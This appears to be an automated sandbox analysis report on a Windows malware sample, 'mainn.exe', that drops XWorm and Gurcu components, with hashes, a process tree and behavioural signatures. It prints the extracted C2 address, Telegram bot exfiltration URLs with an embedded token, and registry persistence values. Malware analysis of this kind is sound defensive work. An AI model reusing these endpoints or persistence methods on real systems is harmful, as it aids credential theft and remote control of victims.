Analysis
-
max time kernel
24s -
max time network
39s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system -
submitted
29-09-2024 15:44
Static task
static1
Behavioral task
behavioral1
Sample
mainn.exe
Resource
win10v2004-20240802-en
General
-
Target
mainn.exe
-
Size
28.1MB
-
MD5
14af5fd5c08fdaa64bb27a27eecef8fa
-
SHA1
64d7140ff222476e9fced02dd280c299ef6a738a
-
SHA256
8cd387950e8bd57026c00d9f9e0ccd17170f6d01bbc9e047f94e802162247755
-
SHA512
6574286fd658c714c212b55c3a9f3d59c614b68bfeb04d543b184377ccd16220e2d430b9c3089f9608b4a54ee66b9f6e84a40cd631d57a3629aa572d5fab229b
-
SSDEEP
786432:SmhBmh9xCGoeWKFD4cOBNvNi7DrhB9V0ADhDX:SIBmAGJWGDgveXhzV0A
Malware Config
Extracted
xworm
reason-warnings.gl.at.ply.gg:20382
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
gurcu
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendMessage?chat_id=-1002245526003
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/getUpdates?offset=-
https://api.telegram.org/bot7258239318:AAE_J6DhWLSRk9YOV8l1ienRdy5HsJZuR6I/sendDocument?chat_id=-1002245526003&caption=%F0%9F%93%B8Screenshot%20take
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000900000002344b-13.dat family_xworm behavioral1/memory/4080-29-0x0000000000930000-0x0000000000962000-memory.dmp family_xworm -
MilleniumRat
MilleniumRat is a remote access trojan written in C#.
-
Modifies WinLogon for persistence 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\", \"C:\\Users\\Public\\Music\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\", \"C:\\Users\\Public\\Music\\RuntimeBroker.exe\", \"C:\\Users\\Public\\Videos\\wininit.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\", \"C:\\Users\\Public\\Music\\RuntimeBroker.exe\", \"C:\\Users\\Public\\Videos\\wininit.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\All Users\\TextInputHost.exe\", \"C:\\Users\\Public\\Music\\RuntimeBroker.exe\", \"C:\\Users\\Public\\Videos\\wininit.exe\", \"C:\\Recovery\\WindowsRE\\dllhost.exe\", \"C:\\Program Files (x86)\\MSBuild\\cmd.exe\"" ChainComServermonitor.exe -
Process spawned unexpected child process 15 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3840 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4724 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4980 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3772 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5100 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1512 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4504 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4012 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1748 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2548 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2648 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1924 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4020 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2144 3328 schtasks.exe 95 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 840 3328 schtasks.exe 95 -
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
description pid Process procid_target PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 PID 4424 created 3444 4424 setup.exe 55 -
pid Process 1296 powershell.exe 4956 powershell.exe 4052 powershell.exe 2344 powershell.exe 2824 powershell.exe 320 powershell.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation ChainComServermonitor.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation main.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Update.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation mainn.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Build.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation s.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation svchost.exe -
Executes dropped EXE 17 IoCs
pid Process 3504 main.exe 4080 system user.exe 4068 main.exe 5100 Build.exe 3568 hacn.exe 3492 based.exe 436 hacn.exe 1948 based.exe 4560 s.exe 4852 svchost.exe 4416 main.exe 4424 setup.exe 3208 ChainComServermonitor.exe 2472 rar.exe 2664 Update.exe 2696 wininit.exe 2440 updater.exe -
Loads dropped DLL 22 IoCs
pid Process 4068 main.exe 4068 main.exe 436 hacn.exe 436 hacn.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 1948 based.exe 4416 main.exe 2664 Update.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 11 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Public\\Music\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\Public\\Videos\\wininit.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\MSBuild\\cmd.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Program Files (x86)\\MSBuild\\cmd.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ChromeUpdate = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLog\\Update.exe" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Users\\All Users\\TextInputHost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TextInputHost = "\"C:\\Users\\All Users\\TextInputHost.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Users\\Public\\Music\\RuntimeBroker.exe\"" ChainComServermonitor.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\Public\\Videos\\wininit.exe\"" ChainComServermonitor.exe Set value (str) 
\REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Recovery\\WindowsRE\\dllhost.exe\"" ChainComServermonitor.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 26 raw.githubusercontent.com 27 raw.githubusercontent.com 32 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 18 ip-api.com -
Drops file in System32 directory 2 IoCs
description ioc Process File created \??\c:\Windows\System32\CSC53459E939ED4494494129E178E3262D8.TMP csc.exe File created \??\c:\Windows\System32\lcv0ji.exe csc.exe -
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1924 tasklist.exe 5052 tasklist.exe 1636 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4424 set thread context of 2632 4424 setup.exe 196 -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files (x86)\MSBuild\ebf1f9fa8afd6d ChainComServermonitor.exe File created C:\Program Files\Google\Chrome\updater.exe setup.exe File created C:\Program Files (x86)\MSBuild\cmd.exe ChainComServermonitor.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\ServiceState\WinHttpAutoProxySvc\setup.exe ChainComServermonitor.exe File opened for modification C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk svchost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 2444 sc.exe 936 sc.exe 1036 sc.exe 4416 sc.exe 4412 sc.exe -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x000700000002344f-6.dat pyinstaller behavioral1/files/0x0009000000023455-59.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Build.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language s.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 Update.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Update.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4812 timeout.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1176 WMIC.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings svchost.exe Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings ChainComServermonitor.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4552 reg.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 16 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4504 schtasks.exe 4012 schtasks.exe 1748 schtasks.exe 2548 schtasks.exe 4980 schtasks.exe 5100 schtasks.exe 1924 schtasks.exe 4020 schtasks.exe 3772 schtasks.exe 2648 schtasks.exe 4340 schtasks.exe 3840 schtasks.exe 4724 schtasks.exe 1512 schtasks.exe 2144 schtasks.exe 840 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4416 main.exe 4416 main.exe 1296 powershell.exe 1296 powershell.exe 320 powershell.exe 320 powershell.exe 2344 powershell.exe 2344 powershell.exe 1296 powershell.exe 320 powershell.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 2344 powershell.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 4416 main.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 4956 powershell.exe 4956 powershell.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe 3208 ChainComServermonitor.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4080 system user.exe Token: SeDebugPrivilege 4416 main.exe Token: SeDebugPrivilege 1924 tasklist.exe Token: SeDebugPrivilege 5052 tasklist.exe Token: SeDebugPrivilege 3208 ChainComServermonitor.exe Token: SeDebugPrivilege 1296 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 904 powershell.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeSecurityPrivilege 1612 WMIC.exe Token: SeTakeOwnershipPrivilege 1612 WMIC.exe Token: SeLoadDriverPrivilege 1612 WMIC.exe Token: SeSystemProfilePrivilege 1612 WMIC.exe Token: SeSystemtimePrivilege 1612 WMIC.exe Token: SeProfSingleProcessPrivilege 1612 WMIC.exe Token: SeIncBasePriorityPrivilege 1612 WMIC.exe Token: SeCreatePagefilePrivilege 1612 WMIC.exe Token: SeBackupPrivilege 1612 WMIC.exe Token: SeRestorePrivilege 1612 WMIC.exe Token: SeShutdownPrivilege 1612 WMIC.exe Token: SeDebugPrivilege 1612 WMIC.exe Token: SeSystemEnvironmentPrivilege 1612 WMIC.exe Token: SeRemoteShutdownPrivilege 1612 WMIC.exe Token: SeUndockPrivilege 1612 WMIC.exe Token: SeManageVolumePrivilege 1612 WMIC.exe Token: 33 1612 WMIC.exe Token: 34 1612 WMIC.exe Token: 35 1612 WMIC.exe Token: 36 1612 WMIC.exe Token: SeIncreaseQuotaPrivilege 1612 WMIC.exe Token: SeSecurityPrivilege 1612 WMIC.exe Token: SeTakeOwnershipPrivilege 1612 WMIC.exe Token: SeLoadDriverPrivilege 1612 WMIC.exe Token: SeSystemProfilePrivilege 1612 WMIC.exe Token: SeSystemtimePrivilege 1612 WMIC.exe Token: SeProfSingleProcessPrivilege 1612 WMIC.exe Token: SeIncBasePriorityPrivilege 1612 WMIC.exe Token: SeCreatePagefilePrivilege 1612 WMIC.exe Token: SeBackupPrivilege 1612 WMIC.exe Token: SeRestorePrivilege 1612 WMIC.exe Token: SeShutdownPrivilege 1612 WMIC.exe Token: SeDebugPrivilege 1612 WMIC.exe Token: SeSystemEnvironmentPrivilege 1612 WMIC.exe Token: SeRemoteShutdownPrivilege 1612 WMIC.exe Token: SeUndockPrivilege 
1612 WMIC.exe Token: SeManageVolumePrivilege 1612 WMIC.exe Token: 33 1612 WMIC.exe Token: 34 1612 WMIC.exe Token: 35 1612 WMIC.exe Token: 36 1612 WMIC.exe Token: SeIncreaseQuotaPrivilege 1200 WMIC.exe Token: SeSecurityPrivilege 1200 WMIC.exe Token: SeTakeOwnershipPrivilege 1200 WMIC.exe Token: SeLoadDriverPrivilege 1200 WMIC.exe Token: SeSystemProfilePrivilege 1200 WMIC.exe Token: SeSystemtimePrivilege 1200 WMIC.exe Token: SeProfSingleProcessPrivilege 1200 WMIC.exe Token: SeIncBasePriorityPrivilege 1200 WMIC.exe Token: SeCreatePagefilePrivilege 1200 WMIC.exe Token: SeBackupPrivilege 1200 WMIC.exe Token: SeRestorePrivilege 1200 WMIC.exe Token: SeShutdownPrivilege 1200 WMIC.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 2664 Update.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4276 wrote to memory of 3504 4276 mainn.exe 82 PID 4276 wrote to memory of 3504 4276 mainn.exe 82 PID 4276 wrote to memory of 4080 4276 mainn.exe 83 PID 4276 wrote to memory of 4080 4276 mainn.exe 83 PID 3504 wrote to memory of 4068 3504 main.exe 84 PID 3504 wrote to memory of 4068 3504 main.exe 84 PID 4068 wrote to memory of 3260 4068 main.exe 85 PID 4068 wrote to memory of 3260 4068 main.exe 85 PID 3260 wrote to memory of 5100 3260 cmd.exe 144 PID 3260 wrote to memory of 5100 3260 cmd.exe 144 PID 3260 wrote to memory of 5100 3260 cmd.exe 144 PID 5100 wrote to memory of 3568 5100 Build.exe 88 PID 5100 wrote to memory of 3568 5100 Build.exe 88 PID 5100 wrote to memory of 3492 5100 Build.exe 90 PID 5100 wrote to memory of 3492 5100 Build.exe 90 PID 3568 wrote to memory of 436 3568 hacn.exe 91 PID 3568 wrote to memory of 436 3568 hacn.exe 91 PID 3492 wrote to memory of 1948 3492 based.exe 92 PID 3492 wrote to memory of 1948 3492 based.exe 92 PID 436 wrote to memory of 868 436 hacn.exe 93 PID 436 wrote to memory of 868 436 hacn.exe 93 PID 868 wrote to memory of 4560 868 cmd.exe 96 PID 868 wrote to memory of 4560 868 cmd.exe 96 PID 868 wrote to memory of 4560 868 cmd.exe 96 PID 4560 wrote to memory of 4852 4560 s.exe 150 PID 4560 wrote to memory of 4852 4560 s.exe 150 PID 4560 wrote to memory of 4852 4560 s.exe 150 PID 4560 wrote to memory of 4416 4560 s.exe 99 PID 4560 wrote to memory of 4416 4560 s.exe 99 PID 1948 wrote to memory of 2632 1948 based.exe 101 PID 1948 wrote to memory of 2632 1948 based.exe 101 PID 1948 wrote to memory of 1796 1948 based.exe 102 PID 1948 wrote to memory of 1796 1948 based.exe 102 PID 1948 wrote to memory of 4092 1948 based.exe 103 PID 1948 wrote to memory of 4092 1948 based.exe 103 PID 4852 wrote to memory of 2072 4852 svchost.exe 108 PID 4852 wrote to memory of 2072 4852 svchost.exe 108 PID 4852 wrote to memory of 2072 4852 svchost.exe 108 PID 4560 wrote to memory of 4424 4560 s.exe 100 PID 4560 
wrote to memory of 4424 4560 s.exe 100 PID 1948 wrote to memory of 3844 1948 based.exe 109 PID 1948 wrote to memory of 3844 1948 based.exe 109 PID 1948 wrote to memory of 1200 1948 based.exe 153 PID 1948 wrote to memory of 1200 1948 based.exe 153 PID 1200 wrote to memory of 1924 1200 cmd.exe 152 PID 1200 wrote to memory of 1924 1200 cmd.exe 152 PID 2072 wrote to memory of 2216 2072 WScript.exe 115 PID 2072 wrote to memory of 2216 2072 WScript.exe 115 PID 2072 wrote to memory of 2216 2072 WScript.exe 115 PID 3844 wrote to memory of 5052 3844 cmd.exe 117 PID 3844 wrote to memory of 5052 3844 cmd.exe 117 PID 2632 wrote to memory of 2344 2632 cmd.exe 118 PID 2632 wrote to memory of 2344 2632 cmd.exe 118 PID 1796 wrote to memory of 1296 1796 cmd.exe 140 PID 1796 wrote to memory of 1296 1796 cmd.exe 140 PID 4092 wrote to memory of 320 4092 cmd.exe 120 PID 4092 wrote to memory of 320 4092 cmd.exe 120 PID 2216 wrote to memory of 3208 2216 cmd.exe 121 PID 2216 wrote to memory of 3208 2216 cmd.exe 121 PID 1948 wrote to memory of 2028 1948 based.exe 122 PID 1948 wrote to memory of 2028 1948 based.exe 122 PID 2028 wrote to memory of 4956 2028 cmd.exe 124 PID 2028 wrote to memory of 4956 2028 cmd.exe 124 PID 1948 wrote to memory of 4960 1948 based.exe 127 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:616
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:316
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:676
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:964
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:448
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:1028
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1040
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1048
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1188
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:2828
-
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Executes dropped EXE
PID:2440
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵PID:1232
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1272
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1380
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1400
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1412
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1440
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1488
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2580
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1596
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1660
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1724
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1784
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1836
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1880
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1892
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1928
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1968
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1312
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2316
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2408
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2680
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2788
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2896
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2992
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3444
-
C:\Users\Admin\AppData\Local\Temp\mainn.exe"C:\Users\Admin\AppData\Local\Temp\mainn.exe"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4276 -
C:\Users\Admin\AppData\Roaming\main.exe"C:\Users\Admin\AppData\Roaming\main.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Users\Admin\AppData\Roaming\main.exe"C:\Users\Admin\AppData\Roaming\main.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID: 4068
[depth 5] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI35042\Build.exe -pbeznogym
  - Suspicious use of WriteProcessMemory
  PID: 3260
[depth 6] C:\Users\Admin\AppData\Local\Temp\_MEI35042\Build.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\_MEI35042\Build.exe -pbeznogym
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 5100
[depth 7] C:\ProgramData\Microsoft\hacn.exe
  cmdline: "C:\ProgramData\Microsoft\hacn.exe"
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID: 3568
[depth 8] C:\ProgramData\Microsoft\hacn.exe
  cmdline: "C:\ProgramData\Microsoft\hacn.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID: 436
[depth 9] C:\Windows\system32\cmd.exe
  cmdline: C:\Windows\system32\cmd.exe /c start C:\Users\Admin\AppData\Local\Temp\_MEI35682\s.exe -pbeznogym
  - Suspicious use of WriteProcessMemory
  PID: 868
[depth 10] C:\Users\Admin\AppData\Local\Temp\_MEI35682\s.exe
  cmdline: C:\Users\Admin\AppData\Local\Temp\_MEI35682\s.exe -pbeznogym
  - Checks computer location settings
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 4560
[depth 11] C:\ProgramData\svchost.exe
